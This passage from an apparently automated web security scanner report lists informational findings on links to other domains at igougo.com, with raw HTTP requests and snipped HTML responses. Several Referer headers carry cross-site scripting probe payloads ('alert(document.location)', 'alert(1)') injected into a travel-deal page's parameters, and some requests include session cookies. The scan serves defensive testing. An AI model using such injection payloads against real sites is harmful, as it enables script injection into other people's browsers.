<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.207. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="jPFyPOMFqOIyySa1Ijk47BJFS78c8e34J/QbTBG6D+LxhAxUsjypMF6hiFDTpoMbcfo9sE57OmQ9GgbZpzfvNckFyhKdrmHnA0uwRcf2yHhSGoL+1kOWQ6RHFhI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.208. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:52:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="B9TPERwQcR+D/nBPJDRqBKD1IcNELB0s1zPw+XALdvHgPFTe4T0RRGzh0YSgIuK78WpCRw48jXCy7RKSJLmMTPuuebMaFQABqNR5D8K4959K3DUL1p0gQOIzC9k=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.209. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="htUBgDWgvvvhpb2xHSKIzmWayFVjHUNiN+bbTswgTjdNej6MQx2CBFHihW9CB61llOgCDzIRoiGaakK7axh51mklWwWfScOWQx9a7tggZDZI6snXPCpFOlzwKII=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.210. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1; mbox=check#true#1317601683|session#1317601622475-177474#1317603483|PC#1317601622475-177474.19#1318811230; __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; SL_UVId=2BC47C1462303C7A

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="3N4s99OteDpCXgpNG2PjNUab70AmGz5GNt8h7GVhdJlW5f7uORj9diLS188nzy3C95evwfUCPht+S0+LL/XseWCdGKfWD3MqIININNQGXpT1AOgH8SdbDoTSVkI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.211. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
